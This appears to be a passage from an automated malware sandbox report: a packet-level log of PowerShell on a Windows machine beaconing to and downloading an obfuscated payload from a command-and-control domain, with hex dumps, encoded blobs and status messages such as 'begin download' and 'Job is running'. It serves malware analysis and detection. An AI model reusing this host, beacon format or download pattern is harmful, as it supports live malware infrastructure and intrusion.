                                                                                                                          Data Ascii: %jlc{bn<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Rje1cFWUPUmKP1qDXkH0LGqYOUCLWmH0X1eW`T82LDuKP1GoRTORLmmYdEG`T1D4RTOJ`FOHPoOiW14n[DerelKqNYGkLkm0RVq{UjOoLDuKP1GoRTORc0qYSlu`VDq7W2mRbmqXcFSKSECoRji``FKHWlyQe{CMRTOC[1mETkG
                                                                                                                          2024-11-08 09:58:14 UTC1369INData Raw: 56 55 48 34 65 44 76 78 54 55 4f 4e 57 44 57 34 55 59 71 4b 4c 54 31 78 57 6c 79 51 57 46 75 35 55 6d 53 5b 4c 44 30 49 57 59 6d 60 53 44 34 75 55 6c 30 57 4f 57 71 54 52 55 53 5b 57 46 69 71 55 54 53 56 60 30 71 54 57 59 71 4e 60 6a 54 76 55 6d 65 56 60 6a 30 37 57 55 57 51 57 46 53 71 55 31 53 57 4c 6a 30 70 54 55 4b 4e 64 6a 4b 70 55 59 71 4b 64 44 30 54 60 46 30 60 57 46 4f 35 55 6a 65 4e 60 44 30 44 60 32 6d 4e 63 54 6a 31 55 30 53 6e 60 54 31 78 54 59 71 60 57 31 34 6e 55 54 65 47 4f 44 30 59 57 59 69 5b 64 6a 6d 35 55 54 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 5b 44 69 4a 4f 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 60 56 48 78 54 6b 57 4b 53 45 43
                                                                                                                          Data Ascii: VUH4eDvxTUONWDW4UYqKLT1xWlyQWFu5UmS[LD0IWYm`SD4uUl0WOWqTRUS[WFiqUTSV`0qTWYqN`jTvUmeV`j07WUWQWFSqU1SWLj0pTUKNdjKpUYqKdD0T`F0`WFO5UjeN`D0D`2mNcTj1U0Sn`T1xTYq`W14nUTeGOD0YWYi[djm5UTOKO1SSc3eKP1Go[DiJOTSSc3eKP1GoRTOC[1mHb14E`TGoRTOC[1mEPVeKP1GoRTOR`VHxTkWKSEC
                                                                                                                          2024-11-08 09:58:14 UTC1197INData Raw: 44 75 44 54 56 39 38 23 28 28 3a 0b 25 70 6c 6d 6e 6b 79 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 30 58 30 5b 44 53 46 65 54 38 49 54 6c 79 60 53 46 79 75 56 56 71 4f 4f 44 30 45 4f 56 71 68 4c 6b 43 33 56 6c 30 72 62 30 71 54 52 59 5b 60 53 30 6a 7b 55 6a 65 4f 64 44 38 49 56 59 71 4e 53 31 30 34 56 6d 53 6b 64 44 30 49 54 55 53 4e 60 6d 47 34 55 6c 71 6b 64 6a 38 54 52 6c 69 51 57 30 54 7b 56 6a 65 53 4c 54 30 37 56 55 43 4f 60 6a 5b 73 56 56 71 53 64 44 34 54 56 55 57 4e 60 6c
                                                                                                                          Data Ascii: DuDTV98#((:%plmnkyb<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LL0X0[DSFeT8ITly`SFyuVVqOOD0EOVqhLkC3Vl0rb0qTRY[`S0j{UjeOdD8IVYqNS104VmSkdD0ITUSN`mG4Ulqkdj8TRliQW0T{VjeSLT07VUCO`j[sVVqSdD4TVUWN`l


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.11.3049732172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:14 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0926b898b3d3eca0a81e1c210 HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 308
                                                                                                                          2024-11-08 09:58:14 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 64 66 37 34 63 31 38 66 33 34 63 32 65 37 31 30 64 38 36 34 32 36 37 33 39 32 61 39 65 37 64 64 35 33 36 34 32 31 64 62 34 31 35 36 39 36 39 35 62 61 66 31 62 34 65 31 32 61 38 33 63 66 62 31 33 37 64 35 66 65 64 34 66 61 62 33 38 39 64 63 33 66 65 31 66 39 64 31 34 65 32 65 61 39 62 30 62 31 63 36 66 34 33 36 65 61 64 36 63 38 33 33 61 36 37 66 63 33 34 37 30 35 61 33 34 63 65 33 37 66 39 39 65 63 33 39 30 63 33 66 38 34 63 66 66 31 34 65 32 33 30 31 61 36 61 36 32 35 36 36 61 34 36 66 66 35 30 66 38 62 65 39 63 65 32 61 35 61 63 35 65 65 34 36 63 31 38 39 30 65 31 36 66 63 34 30
                                                                                                                          Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40
                                                                                                                          2024-11-08 09:58:15 UTC946INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:15 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbJURrk5mrXE7hXcgW39sOD9RRZazh3NzmKoCoNSRr81A7Be6BxRUoWnTKggIkOrpHffPR6H%2Bny6PHO8ePP%2BAezCp835AHNLJSuhUW4wsZE%2BPigO96%2FCD1oaSadnUzU3zrhboAIzKDyQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=26133&sent=11234&recv=5606&lost=0&retrans=0&sent_bytes=15735072&recv_bytes=109973&delivery_rate=8423076&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b415fd21876c-ORD
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=122302&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1258&delivery_rate=31278&cwnd=118&unsent_bytes=0&cid=ca1a6f175870f285&ts=924&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.11.3049733172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:15 UTC370OUTGET /file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40853878a3246bd074c17326c34158 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 09:58:16 UTC1067INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:16 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 21826
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo48SzSMZnhc0x11pwP97DvAuixj%2FJ97MiMWxdYpTn%2F2dWX4V654FJ9UMThcjEheKqUG7bHMPoHUGIpyW5rYDQLcC%2BtFT6%2FGCeCFI8MDuWE2mxjFjxkyV%2B7nXiAcNGqDd4qiMCC4H%2F1u"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=30302&sent=11236&recv=5608&lost=0&retrans=0&sent_bytes=15735825&recv_bytes=110980&delivery_rate=8423076&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b41cff4d431c-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102154&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=37465&cwnd=252&unsent_bytes=0&cid=be86c15f479c04d9&ts=811&x=0"
                                                                                                                          2024-11-08 09:58:16 UTC302INData Raw: 25 79 6b 64 69 6c 6d 74 79 70 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 64 6d 6a 76 56 59 71 6e 63 47 6d 54 56 55 57 60 57 46 69 75 55 6d 53 53 4c 6a 30 44 60 32 65 4e 57 30 54 30 55 6c 71 42 63 54 30 75 54 6c 69 4e 57 30 57 34 56 6a 53 42 63 54 30 37 56 55 47 60 60 6d 57 34 55 56 71 43 65 31 34 59 56 59 71 4f 57 31 34 72 55 6d 53 52 63 57 6d 75 55 6c 75 4e 53 30 54 78 56 55 4b 4f 4c 44 35 78 54 55 4f 4e 53 30 44 78 55 54 65 47 4c 57 71 54 57 55 57 5b 64 6a 71 6e 55 6f 71 60 63 47 6d 34 52 55 65 44 54 56 38 4e 50 33 6d 4f 5b 30 44 7b 52 6c 79 5b 56 47 4b 72 52 54 65
                                                                                                                          Data Ascii: %ykdilmtypx<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#dmjvVYqncGmTVUW`WFiuUmSSLj0D`2eNW0T0UlqBcT0uTliNW0W4VjSBcT07VUG``mW4UVqCe14YVYqOW14rUmSRcWmuUluNS0TxVUKOLD5xTUONS0DxUTeGLWqTWUW[djqnUoq`cGm4RUeDTV8NP3mO[0D{Rly[VGKrRTe
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 47 77 60 33 4c 78 55 6f 6d 69 56 44 48 76 54 56 30 35 65 6d 6a 78 62 33 65 50 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 56 57 62 76 5b 31 75 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 4b 6b 4c 30 4b 34 58 57 62 30 63 6d 69 55 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 65 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 31 35 76 58 33 30 72 65 57 6e 79 4c 46 75 60 63 56 79 7b 56 6d 5b 56 64 56 4b 43 4c 44 75 4b 50 31 47 6f 52 54 4f 73 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 5b 46 53 57 4f 73 4e 57 69 53 60 33 69 50 54 7b 47 53 5b 31 6d 73 52 6c 79 60 4c 6c 79 30 52 54 57 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52
                                                                                                                          Data Ascii: Gw`3LxUomiVDHvTV05emjxb3ePT1H2SGGw[1mEPVekS1[4VWbv[1uCLDuKP1GoRTOC[1mEPlKkL0K4XWb0cmiUTl0iW2irWTeFLFGEe14E`TGoRTOC[1mEPVeYL15vX30reWnyLFu`cVy{Vm[VdVKCLDuKP1GoRTOsUjOoLDuKP1GoRT[FSWOsNWiS`3iPT{GS[1msRly`Lly0RTWRelPxOYOhLj[sRTORcVGYdFyWS1XvXTOKO1SSc3eKP1GoR
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 68 4c 6a 6d 30 54 30 65 53 62 44 6d 6f 4c 44 75 6c 54 31 4b 72 58 6a 69 4e 63 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 42 54 6d 4b 47 62 47 43 56 4c 44 71 4b 57 45 43 31 57 54 6d 45 52 6a 75 68 4c 6a 6d 6f 56 6c 30 46 62 46 4b 49 57 6c 75 4b 52 47 4b 33 52 54 69 4e 4c 47 6d 58 52 6b 43 4c 60 54 6d 4e 50 33 35 76 55 6a 4f 6f 4c 44 75 44 54 56 38 4e 50 33 62 76 52 30 71 74 57 6f 57 5b 4c 30 4b 76 58 6b 48 31 5b 30 4b 49 4e 55 4f 68 63 59 69 33 56 57 65 53 65 47 4b 75 63 49 4f 60 57 57 71 34 58 6b 48 79 57 6c 4f 75 65 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 48 50 6c 69 6b 63 54 5b 31 52 54 4f 6f 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 62 7b 55 6b 43 6b 63 56 79 30 56 6b 44 76 60 30 5b 58 52 6f 4f 4c 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56
                                                                                                                          Data Ascii: hLjm0T0eSbDmoLDulT1KrXjiNcDmHb14E`TGoRTOBTmKGbGCVLDqKWEC1WTmERjuhLjmoVl0FbFKIWluKRGK3RTiNLGmXRkCL`TmNP35vUjOoLDuDTV8NP3bvR0qtWoW[L0KvXkH1[0KINUOhcYi3VWeSeGKucIO`WWq4XkHyWlOue3eme{CMRTOC[1mHPlikcT[1RTOoUjOqPVeKP1GoRTOC[0b{UkCkcVy0VkDv`0[XRoOLPUCMRTOC[1mEPV
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 4c 46 4f 74 57 6c 79 4d 57 6b 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4f 4e 4c 46 4f 75 63 49 57 60 4c 55 43 73 57 45 4f 56 4c 46 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 32 4f 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4b 4a 4f 56 53 49 57 6c 53 4a 53 6c 69 33 58 33 75 31 63 46 57 55 50 55 6d 4b 53 44 57 4e 50 33 6d 43 5b 31 6d 45 50 59 43 44 54 56 38 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 52 47 4b 34 5b 57 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 55 56 65 57 63 57 5b 6e 56 6a 4f 42 4c 46 47 49 57 56 65 60 63 56 79 7b 56 6d 4f 42 62 46 4b 74 54 6f 5b 4b 53 31 57 6f 56 56 34 72 4c 47 71 55 50 6c 69 6b 63 6a 71 6e 5b 57 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f
                                                                                                                          Data Ascii: LFOtWlyMWkCNP3mC[1mEPVeKP1GoW{ONLFOucIW`LUCsWEOVLFOHWkCRcVy{Vm[B`FSI[2ODTV8NP3mC[1mEPVeKP1GoW{KJOVSIWlSJSli3X3u1cFWUPUmKSDWNP3mC[1mEPYCDTV8NP3bvR1mEPVeKRGK4[WOBO1SSc3eKP1GoRTOC[1mEUVeWcW[nVjOBLFGIWVe`cVy{VmOBbFKtTo[KS1WoVV4rLGqUPlikcjqn[WDvR1mEPVeKP1GoRTO
                                                                                                                          2024-11-08 09:58:16 UTC517INData Raw: 30 5b 31 58 31 57 60 62 46 4b 49 57 6a 5b 6d 53 33 79 37 5b 44 69 4e 50 6c 4b 75 54 6a 57 60 57 32 69 72 5b 44 65 57 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 69 42 60 46 4f 75 53 6f 53 4b 50 33 65 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4f 4e 4c 46 4f 75 63 49 57 60 4c 55 43 73 54 6c 30 72 62 30 71 57 4f 56 69 68 57 30 57 6f 54 47 4f 43 60 57 71 59 4c 59 65 6a 52 46 75 30 5b 44 69 6e 4c 44 6d 71 65 33 65 4b 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 57 62 30 4c 47 69 55 54 6d 57 69 57 7b 47 72 58 6b 4f 56 4c 47 54 78 57 6c 71 68 4c 6b 57 73 58 32 6d 43 4e 54 6d 44 56 59 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 44 76 52 31 6d 45 50 56 65 4b 50 33 75 4e 50 33 62 76 52 31 53 53 63 33 65 4b
                                                                                                                          Data Ascii: 0[1X1W`bFKIWj[mS3y7[DiNPlKuTjW`W2ir[DeW[3W2LDuKP1GoRTiB`FOuSoSKP3eNP3mC[1mEPVeKP1GoW{ONLFOucIW`LUCsTl0rb0qWOVihW0WoTGOC`WqYLYejRFu0[DinLDmqe3eKPUCMRTOC[1mEPVeKP1KhXWb0LGiUTmWiW{GrXkOVLGTxWlqhLkWsX2mCNTmDVYeKP1GoRTOC[1mEPVeKP1GoRTDvR1mEPVeKP3uNP3bvR1SSc3eK
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 65 56 54 57 6d 58 54 6c 38 4d 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 46 53 57 4f 73 4e 57 69 53 60 33 69 50 54 7b 47 53 5b 31 6d 73 56 6f 43 68 53 30 57 6f 56 6d 69 6e 62 46 4c 7b 54 6f 71 51 60 54 47 73 56 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 71 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 54 6a 65 56 62 30 71 58 54 6c 79 4b 52 47 4b 77 56 6d 4f 42 63 56 47 59 64 46 79 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6a 71 72 58 6d 62 34 4c 6d 71 55 4c 54 71 6a 53 30 5b 31 52 54 4c 79 54 57 6d 58 54 6c 38 4b 50 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 31 47 31 54 6c 31 34 64 57 6a 78 57 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 57 57 57 4b 4d 57
                                                                                                                          Data Ascii: eVTWmXTl8MT1H2SGGw[1mEPVeKP1GoRT[FSWOsNWiS`3iPT{GS[1msVoChS0WoVminbFL{ToqQ`TGsVl0rb0qVPlijS3eqSGGwUjOqPVeKP1GoRTOC[1mEPVeKP10oTjeVb0qXTlyKRGKwVmOBcVGYdFyDTV8oRTOC[1mEPVeKSjqrXmb4LmqULTqjS0[1RTLyTWmXTl8KP0KuXWe5cGWISkCiP1G1Tl14dWjxWT4E`TGoRTOC[1mEPVeWWWKMW
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 4a 52 47 4b 34 5b 47 65 57 5b 33 47 59 4f 56 75 69 57 31 34 6e 5b 44 65 72 65 57 71 34 50 6b 43 69 53 30 57 6f 56 6c 30 72 62 30 71 55 50 6b 4f 5b 56 44 30 6f 56 6c 31 34 4c 56 4b 75 54 56 65 5b 57 7b 57 73 52 54 65 52 63 46 4b 49 57 6b 43 60 57 30 47 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 52 6c 79 6a 52 47 5b 34 58 6c 6d 43 60 33 53 48 52 6b 47 60 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6d 69 5b 57 33 76 76 52 54 65 60 65 6c 4f 71 50 6c 69 4b 52 44 34 77 58 6b 4f 4a 4c 44 6d 49 63 49 57 6a 53 30 5b 34 5b 46 30 46 62 31 6d 49 52 6c 79 60 63 55 6d 34 56 6d 4f 42 60 6c 47 49 57 6c 71 69 4c 6c 79 30 56 6f 6d 42 60 47 6e 78 53 6f
                                                                                                                          Data Ascii: JRGK4[GeW[3GYOVuiW14n[DereWq4PkCiS0WoVl0rb0qUPkO[VD0oVl14LVKuTVe[W{WsRTeRcFKIWkC`W0GNP3mC[1mEPVeKP1GoRTOC[1mHRlyjRG[4XlmC`3SHRkG`TUCMRTOC[1mEPVeKP1H4SGGwUjOqPVeKP1GoRTOC[1m4Pmi[W3vvRTe`elOqPliKRD4wXkOJLDmIcIWjS0[4[F0Fb1mIRly`cUm4VmOB`lGIWlqiLly0VomB`GnxSo
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 65 47 57 48 52 6f 5b 6b 53 30 5b 34 5b 44 69 73 5b 30 4f 47 65 44 30 54 57 49 43 6b 56 44 5b 4e 54 47 4b 72 54 6d 69 53 57 6a 71 46 56 44 5b 35 55 6c 47 59 55 6f 6d 68 4c 31 34 33 56 6c 34 52 58 30 69 46 5b 49 43 68 63 57 4b 33 5b 45 4f 4e 58 30 69 47 55 6b 47 6b 63 6a 71 72 58 6c 34 52 57 30 71 58 52 6f 71 69 57 7b 6d 30 56 44 5b 35 54 56 48 78 64 49 43 5b 4c 6c 79 72 58 7b 47 35 58 30 54 7b 63 49 71 6a 53 30 5b 31 52 30 4c 30 53 6c 4b 75 53 6c 6d 68 53 30 5b 4f 57 6d 57 47 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 44 76 52 31 6d 45 50 56 65 4b 53 33 79 75 52 31 4f 52 62 46 4c 79 57 6a 4b 53 4c 45 6d 32 56 6d 62 31 5b 31 79 59 57 6f 69 4b 53 44 57 76 53 47 47 77 5b 31 6d 45 50 56 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 58 57 69
                                                                                                                          Data Ascii: eGWHRo[kS0[4[Dis[0OGeD0TWICkVD[NTGKrTmiSWjqFVD[5UlGYUomhL143Vl4RX0iF[IChcWK3[EONX0iGUkGkcjqrXl4RW0qXRoqiW{m0VD[5TVHxdIC[LlyrX{G5X0T{cIqjS0[1R0L0SlKuSlmhS0[OWmWGO1SSc3eKP1GoRTDvR1mEPVeKS3yuR1ORbFLyWjKSLEm2Vmb1[1yYWoiKSDWvSGGw[1mEPVeme{CMRTOC[1mEPVeKP1GsXWi
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 54 5b 4e 5b 45 43 47 64 47 47 57 54 6c 71 53 57 55 47 74 54 57 53 52 50 6d 48 79 63 44 4b 59 63 44 5b 42 55 57 57 46 53 57 4b 57 53 6a 38 60 4c 44 71 77 54 57 57 52 56 6d 47 57 4e 54 4b 53 63 55 47 42 54 6b 47 46 50 6d 53 74 5b 44 4b 4f 4c 44 5b 47 56 55 43 46 55 30 6e 76 52 6f 53 53 57 57 4b 52 54 57 5b 76 63 6d 47 54 50 6a 4b 52 53 31 34 42 57 46 75 46 50 6a 30 73 53 6a 57 60 4c 44 5b 50 57 57 57 4a 62 47 47 57 5b 44 34 53 57 55 57 74 54 56 30 6e 50 6d 48 76 63 44 4b 54 57 33 53 42 5b 57 57 46 53 57 4f 57 53 6a 38 6a 4c 44 58 33 54 57 57 6a 55 6d 47 57 4f 55 4f 53 56 49 43 42 54 6b 43 72 50 6d 53 74 5b 44 4b 6a 4c 44 5b 48 54 6d 57 46 55 6d 57 57 52 6f 4b 53 57 56 53 4a 54 57 54 30 63 6d 47 75 60 44 4b 52 53 57 5b 42 57 33 75 46 50 6c 57 47 53 6a 69 52
                                                                                                                          Data Ascii: T[N[ECGdGGWTlqSWUGtTWSRPmHycDKYcD[BUWWFSWKWSj8`LDqwTWWRVmGWNTKScUGBTkGFPmSt[DKOLD[GVUCFU0nvRoSSWWKRTW[vcmGTPjKRS14BWFuFPj0sSjW`LD[PWWWJbGGW[D4SWUWtTV0nPmHvcDKTW3SB[WWFSWOWSj8jLDX3TWWjUmGWOUOSVICBTkCrPmSt[DKjLD[HTmWFUmWWRoKSWVSJTWT0cmGu`DKRSW[BW3uFPlWGSjiR
                                                                                                                          2024-11-08 09:58:16 UTC1369INData Raw: 50 76 53 6c 34 53 57 56 69 4e 54 57 65 52 50 6d 47 74 63 44 4b 52 4c 6f 53 42 56 56 30 6a 50 33 4b 73 53 6a 4b 4f 53 54 5b 44 56 6b 43 46 63 6d 47 57 55 6a 4b 53 57 56 79 42 54 57 65 6a 50 6d 44 79 53 6a 4b 5b 4c 33 53 45 55 54 57 46 52 57 4f 57 53 6c 69 57 57 54 6e 79 54 57 57 6a 60 6d 47 56 53 6c 34 53 63 6d 71 42 54 6b 47 46 50 6d 71 56 53 6a 4b 60 4c 44 5b 47 55 54 57 46 52 6d 47 57 52 6c 6d 53 57 56 69 4e 54 57 65 52 50 6d 47 74 63 44 4b 52 4c 6f 53 42 56 56 30 6a 50 33 4b 73 53 6a 65 4f 53 54 5b 4c 54 57 57 46 62 6d 47 57 5b 45 4f 53 57 31 6e 7b 54 56 31 30 50 6d 4b 54 50 6a 4b 5b 4c 33 53 45 58 6c 75 46 53 47 47 57 53 6c 30 53 57 54 5b 74 54 57 57 56 55 6d 47 59 52 6b 4f 53 63 6d 5b 42 54 31 5b 72 50 6d 65 72 53 6a 4f 6d 57 54 5b 4b 57 57 57 46 57
                                                                                                                          Data Ascii: PvSl4SWViNTWeRPmGtcDKRLoSBVV0jP3KsSjKOST[DVkCFcmGWUjKSWVyBTWejPmDySjK[L3SEUTWFRWOWSliWWTnyTWWj`mGVSl4ScmqBTkGFPmqVSjK`LD[GUTWFRmGWRlmSWViNTWeRPmGtcDKRLoSBVV0jP3KsSjeOST[LTWWFbmGW[EOSW1n{TV10PmKTPjK[L3SEXluFSGGWSl0SWT[tTWWVUmGYRkOScm[BT1[rPmerSjOmWT[KWWWFW


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.11.3049734172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:17 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 85
                                                                                                                          2024-11-08 09:58:17 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                                                          2024-11-08 09:58:18 UTC949INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:18 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEDoC6aturarlpEHXUOitPFWbkP0OkJIDnmwveWX%2F117SD%2FyU%2FwLehmhHYZUm9JNIpMW1V5z7Xz8Qw5XmKQP7pMYH%2B0mczSFm%2BG5BXbfEBhyyg0EbKkynSL2gmFytDpxtq67N5LBTGLe"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11669&sent=11254&recv=5618&lost=0&retrans=0&sent_bytes=15758511&recv_bytes=111856&delivery_rate=11633466&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
